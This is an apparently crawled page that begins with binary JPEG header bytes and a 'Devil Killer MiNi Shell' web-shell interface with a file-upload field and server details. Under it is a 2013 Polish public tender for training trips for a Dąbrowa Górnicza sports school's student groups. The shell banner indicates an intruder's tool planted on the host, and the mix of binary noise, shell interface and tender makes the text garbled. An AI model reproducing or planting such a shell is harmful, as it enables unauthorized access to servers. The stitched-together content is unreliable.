JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/181180-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - cztery grupy sportowe.

Zadanie 1
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków.

Zadanie 2
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy - dwie grupy.

Zadanie 3
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.

Zadanie 4
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa koszykarzy.</b><br>
<b>Numer ogłoszenia: 181180 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Sportowych im. Polskich Olimpijczyków , ul. Chopina 34, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 0-32 2626869, 2626968, faks 0-32 2626968.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zssdg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - cztery grupy sportowe.

Zadanie 1
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków.

Zadanie 2
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy - dwie grupy.

Zadanie 3
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.

Zadanie 4
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa koszykarzy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
1) Przedmiot zamówienia obejmuje realizację 4 (czterech) zadań częściowych.
2) Wykonawca może złożyć ofertę na dowolną liczbę zadań tj. od 1 do 4.
3) Przewidywana całkowita ilość uczestników wynosi - 353 (młodzież - osoby płatne) + 29 opiekunów (osoby bezpłatne) - ilość uczestników może ulec zmianie (zwiększeniu lub zmniejszeniu) z przyczyn niezależnych od Zamawiającego. Przewidywaną ilość uczestników dla zadań od 1 do 4 podano w opisie do każdego zadania. 
4) Zadanie nr 2 tj. grupa siatkarzy obejmuje dwie grupy: I grupa 48 osób + 4 opiekunów; II grupa 52 osób + 5 opiekunów. Dla Zadania 2 - dwie grupy siatkarzy - Zamawiający nie dopuszcza złożenia oferty częściowej. 
5) Terminy wyjazdów dla zadań od 1 do 4 zgodnie z pkt 4 SIWZ i szczegółowym opisem - Część IV SIWZ.
6) Podane terminy dla poszczególnych zadań od 1 do 4 są terminami wymaganymi.
7) Szczegółowy opis warunków dla każdej z grup podano w opisie do każdego zadania - Część IV SIWZ.
8) Zamawiający dopuszcza możliwość zmiany liczby uczestników w poszczególnych grupach. Dokładna liczba uczestników wycieczki, zostanie podana tydzień przed planowanym wyjazdem.
9) Czas trwania wycieczki 5 pełnych dób dla wszystkich grup (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu odpowiednio dla zadań od 1 do 4).
10) Dzienne zapotrzebowanie energetyczne posiłków - min. 3500 kcal - dotyczy wszystkich grup.
11) W dniu przyjazdu Wykonawca przekaże kierownikowi grupy spis planowanych posiłków na każdy dzień z podaniem kcal dla każdego posiłku. Plan posiłków powinien być zaakceptowany przez kierownika grupy.
12) Transport wliczony w cenę oferty.
13) Zamawiający zastrzega sobie możliwość obejrzenia obiektu przed podpisaniem umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis w rejestrze organizatorów turystyki i pośredników turystycznych - zgodnie z ustawą o usługach turystycznych z dnia 29 sierpnia 1997 r. (Dz.U. z 2004r., Nr 113, poz. 2268 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże nie mniej niż 2 (dwie)  wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane, główne usługi, każda o wartości nie mniejszej niż 15.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia tj. polegających na zorganizowaniu wyjazdów turystycznych tj. wycieczki, pielgrzymki, kolonie, obozy itp., z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty wraz z oświadczeniem o spełnieniu warunków udziału w postępowaniu złożony w formie oryginału,
2) Formularz - Status prawny Wykonawcy złożony w formie oryginału,
3) Wykaz części zamówienia jakie Wykonawca powierza Podwykonawcom złożony w formie oryginału, wypełniony  odpowiednio lub z adnotacją -nie dotyczy,
4) Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia
5) oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.).
6) W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca złoży - Opis - Karta Charakterystyki Zadania odpowiednio dla zadania od 1 do 4 złożony w formie oryginału.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany, jakie można wprowadzić do umowy o zamówienie publiczne
1) Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1.1. zmiany terminu wykonania zamówienia oraz terminów pośrednich, o których mowa we wzorze umowy, w następujących przypadkach:
a) wystąpienie siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne 
i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, 
a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
b) wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających przeprowadzenie zamówienia np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
c) wystąpienia masowych zachorowań wśród uczniów, powodujące niemożliwość ich uczestniczenia w wyjeździe we wskazanym terminie, oraz w zakresie zmiany zadeklarowanej ilości uczestników na podstawie rzeczywistej liczby zgłoszeń złożonych przez rodziców oraz rezygnacji z udziału w wyjeździe z uzasadnionych przyczyn w terminie 7 dni przed datą wyjazdu. 
1.2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
a) zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zssdg.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Sportowych im. Polskich Olimpijczyków, 41-300 Dąbrowa Górnicza 
ul. Chopina 34, I piętro, pokój nr A19 (sekretariat szkoły)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:30, miejsce: Zespól Szkół Sportowych im. Polskich Olimpijczyków, ul. Chopina 34, 41-300 Dąbrowa Górnicza, I piętro, sekretariat szkoły (pokój nr A19)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I.Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: (spełnia) lub (nie spełnia), w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.
II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające,  że łącznie spełniają warunki  udziału w postępowaniu.
III. Przed zawarciem umowy Wykonawca zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10 % ceny całkowitej podanej w ofercie.
IV. Zadanie 1 - Wymagany termin pobytu od 09.09.2013 r. do 14.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
V. Zadanie 2 - Wymagany termin pobytu I grupa 48 uczestników +4 trenerów od 09.09.2013 r. - 14.09.2013r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu). Wymagany termin pobytu II grupa 52 uczestników +5 trenerów  od 16.09.2013 r. - 21.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
VI. Zadanie 3 - Wymagany termin pobytu od 08.09.2013 r. - 13.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
VII. Zadanie 4 - Wymagany termin pobytu od 23.09.2013 r. - 28.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW. TERMIN WYJAZDU
1) Przewidywana ilość uczestników 100 osób (młodzież osoby płatne) + 8 opiekunów (osoby bezpłatne). Razem 108 osób.
2) Wymagany termin pobytu od 09.09.2013 r. do 14.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ. ŚRODEK TRANSPORTU
1) Miejscowość: oddalona do 150 km od Dąbrowy Górniczej.
2) Środek transportu - autokar, 
3. OBIEKT. BAZA NOCLEGOWA. BAZA TRENINGOWA
1) Baza noclegowa - pokoje 2,3,4 osobowe, budynek ( budynki ) murowany(-e) ze stałym CO.
2) Zamawiający nie dopuszcza łóżek piętrowych.
3) Osobne pokoje dla opiekunów ( osobno dla kobiet i osobno dla mężczyzn).
4) Pokoje wyposażone w pełny węzeł sanitarny. 
5) Zakwaterowanie w jednym budynku wraz ze stołówką. Zamawiający dopuszcza, że mogą to być oddzielne budynki, muszą jednak znajdować się na terenie jednego ośrodka wykonawcy.
6) Sala gimnastyczna umiejscowiona do 1 km od miejsca zamieszkania.
7) Sala gimnastyczna dostępna w czasie turnusu codziennie po 2 godz. (W czasie trwania zajęć sala gimnastyczna do dyspozycji tylko Zamawiającego).
8) Basen kryty - 25 m ( min. 4 tory, liny torowe grube-sportowe, chorągiewki nawrotowe)- 2 grupy po 1,5 godz. każda rano i 2 grupy po 1,5 godz. każda popołudniu ( łącznie 6 godzin dziennie).
9) Basen oddalony maksymalnie do 30 km od miejsca zakwaterowania. Jeśli basen oddalony jest od miejsca zakwaterowania więcej niż 500 m Wykonawca zapewnia transport. W takim przypadku transport musi być wliczony w cenę oferty.
10) Teren leśny w pobliżu zakwaterowania.
11) Ośrodek bezpośrednio położony przy otwartym akwenie wodnym.
12) Dostęp do łodzi wiosłowych i kajaków (bezpłatnie).
4. OPIEKA MEDYCZNA
1) Lekarz dochodzący (na wezwanie).
2) Izolatka dla chorych.
3) Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
1) Trzy posiłki dziennie z podwieczorkiem (śniadanie, obiad, kolacja).
2) Suchy prowiant na podróż, sok.
3) Codziennie 0,5 l wody mineralnej niegazowanej dla każdego uczestnika obozu.
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1) Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
2) Ubezpieczenie uczestników w czasie podróży i pobytu od nieszczęśliwych wypadków na kwotę nie mniejsza niż 10 000,00 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW. TERMIN WYJAZDU
1) Przewidywana ilość uczestników 100 osób (młodzież osoby płatne) + 9 opiekunów (osoby bezpłatne). Razem 109 osób.
2) Wymagany termin pobytu I grupa 48 uczestników +4 trenerów od 09.09.2013 r. - 14.09.2013r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
3) Wymagany termin pobytu II grupa 52 uczestników +5 trenerów  od 16.09.2013 r. - 21.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ. ŚRODEK TRANSPORTU
1) Miejscowość: oddalona do 150 km od Dąbrowy Górniczej.
2) Środek transportu - autokar, bus.
3. OBIEKT. BAZA NOCLEGOWA. BAZA TRENINGOWA
1) Baza noclegowa - pokoje 2,3,4 osobowe, budynek ( budynki) murowane ze stałym CO.
2) Zakwaterowanie w jednym budynku wraz ze stołówką. Zamawiający dopuszcza, że mogą to być  oddzielne budynki, muszą jednak znajdować się na terenie jednego ośrodka wykonawcy.
3) Zamawiający nie dopuszcza łóżek piętrowych.
4) Osobne pokoje dla opiekunów ( osobne dla kobiet i osobno dla mężczyzn).
5) Pokoje wyposażone w pełen węzeł sanitarnym.
6) Sala gimnastyczna pełnowymiarowa do piłki siatkowej ( dwusektorowa lub zamiennie 2 sale gimnastyczne pełnowymiarowe) 2 x 4 godziny codziennie ( 4 godziny rano i 4 godziny popołudniu), oddalona do 2 km od miejsca zakwaterowania. W przypadku oddalenia sal od miejsca zakwaterowania większego niż 2 km konieczne jest zapewnienie transportu. Transport wliczony w cenę oferty. Treningi dwa razy dziennie w godzinach od 9.00. do 13.00 i od 15.00 do 19.00 ( Kolacja wydawana nie wcześniej niż o godz. 19.45).
7) Dostęp do basenu, 
8) Stały dostęp do boisk di siatkówki plażowej.
4. OPIEKA MEDYCZNA
1) Lekarz dochodzący (na wezwanie).
2) Izolatka dla chorych.
3) Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
1) Trzy posiłki dziennie z podwieczorkiem (śniadanie, obiad, kolacja).
2) Suchy prowiant na podróż, sok
3) Codziennie 0,5 l wody mineralnej niegazowanej dla każdego uczestnika obozu.
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1) Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
2) Ubezpieczenie uczestników w czasie podróży i pobytu od nieszczęśliwych wypadków na kwotę nie mniejsza niż 10 000,00 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW. TERMIN WYJAZDU
1) Przewidywana ilość uczestników 90 osób (młodzież osoby płatne) + 7 opiekunów (osoby bezpłatne). Razem 97 osoby.
